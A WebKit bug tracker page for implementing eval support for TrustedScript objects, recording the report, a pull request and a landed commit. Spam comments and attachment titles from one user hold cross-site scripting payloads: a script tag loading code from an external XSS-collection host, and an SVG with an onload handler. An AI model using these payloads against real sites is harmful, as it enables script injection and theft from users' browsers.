273184 – Implement eval support for TrustedScript objects

RESOLVED FIXED Bug 273184

Implement eval support for TrustedScript objects

https://bugs.webkit.org/show_bug.cgi?id=273184

Summary Implement eval support for TrustedScript objects

Luke Warlow

Reported 2024-04-24 06:35:25 PDT

Implement support for evaluating the code string associated with TrustedScript objects. See Stage 3 proposal https://tc39.es/proposal-dynamic-code-brand-checks/ for more details.

Attachments
'"><script src=https://xss.report/c/wananlife></script> (1.57 KB, image/svg+xml) 2024-04-30 05:37 PDT, wananlife	no flags	Details
'"><script src=https://xss.report/c/wananlife></script> (145 bytes, application/xml) 2024-04-30 05:44 PDT, wananlife	no flags	Details
hackerone wananlife (138 bytes, application/xml) 2024-04-30 05:51 PDT, wananlife	no flags	Details
hackerone wananlife (150 bytes, application/xml) 2024-04-30 05:54 PDT, wananlife	no flags	Details
hackerone wananlife (178 bytes, application/xml) 2024-04-30 05:57 PDT, wananlife	no flags	Details
hackerone wananlife (532 bytes, image/svg+xml) 2024-04-30 06:02 PDT, wananlife	no flags	Details
hackerone wananlife (411 bytes, image/svg+xml) 2024-04-30 06:05 PDT, wananlife	no flags	Details
Show Obsolete (6) View All Add attachment proposed patch, testcase, etc.

Luke Warlow

Comment 1 2024-04-24 07:44:05 PDT

Pull request: https://github.com/WebKit/WebKit/pull/27691

wananlife

Comment 2 2024-04-30 05:37:45 PDT Comment hidden (spam)

Created attachment 471215 [details] '"><script src=https://xss.report/c/wananlife></script>

wananlife

Comment 3 2024-04-30 05:44:04 PDT Comment hidden (spam)

Created attachment 471216 [details] '"><script src=https://xss.report/c/wananlife></script>

wananlife

Comment 4 2024-04-30 05:51:58 PDT Comment hidden (spam)

Created attachment 471217 [details] hackerone wananlife

wananlife

Comment 5 2024-04-30 05:54:07 PDT Comment hidden (spam)

Created attachment 471218 [details] hackerone wananlife

wananlife

Comment 6 2024-04-30 05:57:11 PDT Comment hidden (spam)

Created attachment 471219 [details] hackerone wananlife

wananlife

Comment 7 2024-04-30 06:02:23 PDT Comment hidden (spam)

Created attachment 471220 [details] hackerone wananlife

wananlife

Comment 8 2024-04-30 06:05:21 PDT Comment hidden (spam)

Created attachment 471221 [details] hackerone wananlife

wananlife

Comment 9 2024-04-30 06:08:14 PDT Comment hidden (spam)

Comment on attachment 471221 [details] hackerone wananlife <svg onload="alert('hack wananlife from hackerone')" xmlns="http://www.w3.org/2000/svg" width="300" height="300" viewBox="0 0 300 300">  <rect width="100%" height="100%" fill="#f0f0f0" />  <circle cx="150" cy="150" r="100" fill="#3498db" />  <line x1="50" y1="150" x2="250" y2="150" stroke="#2ecc71" stroke-width="5" />  <rect x="120" y="120" width="60" height="60" fill="#e74c3c" />  <text x="50%" y="50%" font-size="20" text-anchor="middle" fill="#ffffff" dy=".3em">Tech SVG</text> </svg>

Radar WebKit Bug Importer

Comment 10 2024-05-01 06:36:13 PDT

<rdar://problem/127357526>

EWS

Comment 11 2024-05-23 07:50:58 PDT

Committed 279194@main (5e0f9b3cfb2b): <https://commits.webkit.org/279194@main> Reviewed commits have been landed. Closing PR #27691 and removing active labels.

Note You need to log in before you can comment on or make changes to this bug.

Status RESOLVED

Resolution FIXED

Priority P2

Severity Normal

Classification Unclassified

Version Safari 17

Hardware Unspecified

OS Unspecified

Product WebKit

Component JavaScriptCore

Assignee

Luke Warlow

Reported

2024-04-24 06:35 PDT

Modified

2024-05-23 07:51 PDT History

CC List

2 users Show

URL

Keywords InRadar

Depends on

Blocks

267694

Dependencies

tree graph